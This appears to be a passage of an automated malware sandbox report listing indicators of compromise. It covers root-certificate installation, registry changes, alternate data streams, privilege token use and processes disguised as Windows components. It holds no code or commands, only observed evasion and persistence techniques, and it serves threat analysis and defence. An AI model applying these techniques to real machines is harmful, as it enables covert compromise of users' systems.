Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-221 = "Alaskan Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-11 = "Azores Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time"	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time"	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-271 = "Greenwich Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-422 = "Russian Standard Time"	windefender.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-541 = "Myanmar Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time"	C6DB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-771 = "Montevideo Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"	C6DB.exe

Modifies system certificate store 2 TTPs 12 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

patch.execsrss.exe6EF.exebuild2.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a441400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a319000000010000001000000014c3bd3549ee225aece13734ad8ca0b82000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	6EF.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	6EF.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	6EF.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	build2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	build2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	build2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	patch.exe

NTFS ADS 2 IoCs

Processes:

6EF.exeMicrosoftUP.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\winmgmts:\GHPZRGFC\root\CIMV2	6EF.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\winmgmts:\GHPZRGFC\root\CIMV2	MicrosoftUP.exe

Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 147 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

description	flow	ioc
HTTP User-Agent header	147	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

8dec86d0a0c4034b6d688a0610742694517e0d31939c53db11b898c0ba7315c0.exe

pid	process
2952	8dec86d0a0c4034b6d688a0610742694517e0d31939c53db11b898c0ba7315c0.exe
2952	8dec86d0a0c4034b6d688a0610742694517e0d31939c53db11b898c0ba7315c0.exe
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

480
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

8dec86d0a0c4034b6d688a0610742694517e0d31939c53db11b898c0ba7315c0.exe

pid process

2952 8dec86d0a0c4034b6d688a0610742694517e0d31939c53db11b898c0ba7315c0.exe

pid	process
480

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

C6DB.execsrss.exeCL_Debug_Log.txt1BE7.exesc.exeMicrosoftUP.exeMicrosoftUP.exeMicrosoftUP.exe

description	pid	process
Token: SeShutdownPrivilege	1216
Token: SeShutdownPrivilege	1216
Token: SeDebugPrivilege	2088	C6DB.exe
Token: SeImpersonatePrivilege	2088	C6DB.exe
Token: SeSystemEnvironmentPrivilege	2516	csrss.exe
Token: SeRestorePrivilege	2972	CL_Debug_Log.txt
Token: 35	2972	CL_Debug_Log.txt
Token: SeSecurityPrivilege	2972	CL_Debug_Log.txt
Token: SeSecurityPrivilege	2972	CL_Debug_Log.txt
Token: SeDebugPrivilege	2668	1BE7.exe
Token: SeSecurityPrivilege	1708	sc.exe
Token: SeSecurityPrivilege	1708	sc.exe
Token: SeRestorePrivilege	3000	MicrosoftUP.exe
Token: 35	3000	MicrosoftUP.exe
Token: SeSecurityPrivilege	3000	MicrosoftUP.exe
Token: SeSecurityPrivilege	3000	MicrosoftUP.exe
Token: SeRestorePrivilege	704	MicrosoftUP.exe
Token: 35	704	MicrosoftUP.exe
Token: SeSecurityPrivilege	704	MicrosoftUP.exe
Token: SeSecurityPrivilege	704	MicrosoftUP.exe
Token: SeDebugPrivilege	2256	MicrosoftUP.exe
Token: SeDebugPrivilege	2256	MicrosoftUP.exe
Token: 1376537018436	2256	MicrosoftUP.exe
Token: 1724429369412	2256	MicrosoftUP.exe
Token: 1917702897732	2256	MicrosoftUP.exe
Token: 97788144	2256	MicrosoftUP.exe
Token: 97788208	2256	MicrosoftUP.exe
Token: 97788272	2256	MicrosoftUP.exe
Token: 97788336	2256	MicrosoftUP.exe
Token: 97788400	2256	MicrosoftUP.exe
Token: 97779712	2256	MicrosoftUP.exe
Token: 68719476736	2256	MicrosoftUP.exe
Token: 0	2256	MicrosoftUP.exe
Token: 97801104	2256	MicrosoftUP.exe
Token: 4294967296	2256	MicrosoftUP.exe
Token: 0	2256	MicrosoftUP.exe
Token: 99508800	2256	MicrosoftUP.exe
Token: 10304369281383429264	2256	MicrosoftUP.exe
Token: 10304387973081101452	2256	MicrosoftUP.exe
Token: 10304398968197379320	2256	MicrosoftUP.exe
Token: 10304414361360168180	2256	MicrosoftUP.exe
Token: 10304425356476445920	2256	MicrosoftUP.exe
Token: 10304434152569468124	2256	MicrosoftUP.exe
Token: 10304447346709001416	2256	MicrosoftUP.exe
Token: 10304460540848534724	2256	MicrosoftUP.exe
Token: 10304466038406673456	2256	MicrosoftUP.exe
Token: 10232220427880395796	2256	MicrosoftUP.exe
Token: 10232229223973418108	2256	MicrosoftUP.exe
Token: 10304297813127623784	2256	MicrosoftUP.exe
Token: 10232314985880384436	2256	MicrosoftUP.exe
Token: 10232323781973406624	2256	MicrosoftUP.exe
Token: 10232339175136195484	2256	MicrosoftUP.exe
Token: 10232371060973401072	2256	MicrosoftUP.exe
Token: 10592715106256057300	2256	MicrosoftUP.exe
Token: 10160391532261045184	2256	MicrosoftUP.exe
Token: 10304510018871784252	2256	MicrosoftUP.exe
Token: 10304264827778790156	2256	MicrosoftUP.exe
Token: 10232238020066440056	2256	MicrosoftUP.exe
Token: 10232240219089695604	2256	MicrosoftUP.exe
Token: 10232246816159462240	2256	MicrosoftUP.exe
Token: 10232261109810623324	2256	MicrosoftUP.exe
Token: 10232271005415273288	2256	MicrosoftUP.exe
Token: 10232302891252478788	2256	MicrosoftUP.exe
Token: 10232312786857128624	2256	MicrosoftUP.exe

Suspicious use of FindShellTrayWindow 32 IoCs

Processes:

6EF.exeEFB.exeMicrosoftUP.exeMicrosoftUP.exeMicrosoftUP.exeattrib.exe

pid	process
880	6EF.exe
1216
1216
1216
1216
880	6EF.exe
880	6EF.exe
1216
1216
560	EFB.exe
1284	MicrosoftUP.exe
1216
1216
1284	MicrosoftUP.exe
1284	MicrosoftUP.exe
1216
1216
1920	MicrosoftUP.exe
1216
1216
1920	MicrosoftUP.exe
1920	MicrosoftUP.exe
1216
1216
2256	MicrosoftUP.exe
1216
1216
2256	MicrosoftUP.exe
2256	MicrosoftUP.exe
1216
1216
972	attrib.exe

Suspicious use of SendNotifyMessage 12 IoCs

Processes:

6EF.exeMicrosoftUP.exeMicrosoftUP.exeMicrosoftUP.exe

pid	process
880	6EF.exe
880	6EF.exe
880	6EF.exe
1284	MicrosoftUP.exe
1284	MicrosoftUP.exe
1284	MicrosoftUP.exe
